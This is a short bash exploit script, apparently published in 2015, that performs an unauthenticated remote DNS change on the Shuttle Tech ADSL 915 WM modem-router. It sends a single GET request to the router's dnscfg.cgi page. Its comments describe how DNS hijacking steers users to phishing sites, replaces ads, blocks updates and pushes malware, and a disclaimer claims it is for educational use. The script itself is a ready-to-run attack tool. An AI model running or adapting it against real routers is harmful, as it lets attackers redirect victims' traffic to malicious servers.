Shuttle Tech ADSL 915 WM - Unauth Remote DNS Change exploit

1. #!/bin/bash
2. #
3. #        Shuttle Tech ADSL Modem-Router 915 WM
4. #      Unauthenticated Remote DNS Change Exploit
5. #
6. #  Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
7. #  http://www.ethical-hacker.org/
8. #  https://www.facebook.com/ethicalhackerorg
9. #
10. #  Description:  
11. #  The vulnerability exist in the web interface, which is
12. #  accessible without authentication.
13. #
14. #  Once modified, systems use foreign DNS servers,  which are
15. #  usually set up by cybercriminals. Users with vulnerable
16. #  systems or devices who try to access certain sites are
17. #  instead redirected to possibly malicious sites.
18. #  
19. #  Modifying systems' DNS settings allows cybercriminals to
20. #  perform malicious activities like:
21. #
22. #    o  Steering unknowing users to bad sites:
23. #       These sites can be phishing pages that
24. #       spoof well-known sites in order to
25. #       trick users into handing out sensitive
26. #       information.
27. #
28. #    o  Replacing ads on legitimate sites:
29. #       Visiting certain sites can serve users
30. #       with infected systems a different set
31. #       of ads from those whose systems are
32. #       not infected.
33. #  
34. #    o  Controlling and redirecting network traffic:
35. #       Users of infected systems may not be granted
36. #       access to download important OS and software
37. #       updates from vendors like Microsoft and from
38. #       their respective security vendors.
39. #
40. #    o  Pushing additional malware:
41. #       Infected systems are more prone to other
42. #       malware infections (e.g., FAKEAV infection).
43. #
44. #  Warning:
45. #  My first public report on such a serious
46. #  vulnerability was ignored by the manufacturers
47. #  and were committed serious criminal deeds of
48. #  cybercriminals in Brasil. This vulnerability
49. #  could affect millions of users worldwide.
50. #  http://www.exploit-db.com/exploits/16275/
51. #  http://securelist.com/blog/research/57776/the-tale-of-one-thousand-and-one-dsl-modems/
52. #  
53. #  Disclaimer:
54. #  This or previous programs is for Educational
55. #  purpose ONLY. Do not use it without permission.
56. #  The usual disclaimer applies, especially the
57. #  fact that Todor Donev is not liable for any
58. #  damages caused by direct or indirect use of the
59. #  information or functionality provided by these
60. #  programs. The author or any Internet provider
61. #  bears NO responsibility for content or misuse
62. #  of these programs or any derivatives thereof.
63. #  By using these programs you accept the fact
64. #  that any damage (dataloss, system crash,
65. #  system compromise, etc.) caused by the use
66. #  of these programs is not Todor Donev's
67. #  responsibility.
68. #  
69. #  Use them at your own risk!
70. #
71. #  
72.  
73. if [[ $# -gt 3 || $# -lt 2 ]]; then
74.         echo "             Shuttle Tech ADSL Modem-Router 915 WM"
75.         echo "           Unauthenticated Remote DNS Change Exploit"
76.         echo "  ================================================================"
77.         echo "  Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
78.         echo "  Example: $0 133.7.133.7 8.8.8.8"
79.         echo "  Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
80.         echo ""
81.         echo "     Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>"
82.         echo "                  http://www.ethical-hacker.org/"
83.         exit;
84. fi
85. GET=`which GET 2>/dev/null`
86. if [ $? -ne 0 ]; then
87.         echo "  Error : libwww-perl not found =/"
88.         exit;
89. fi
90.         GET "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1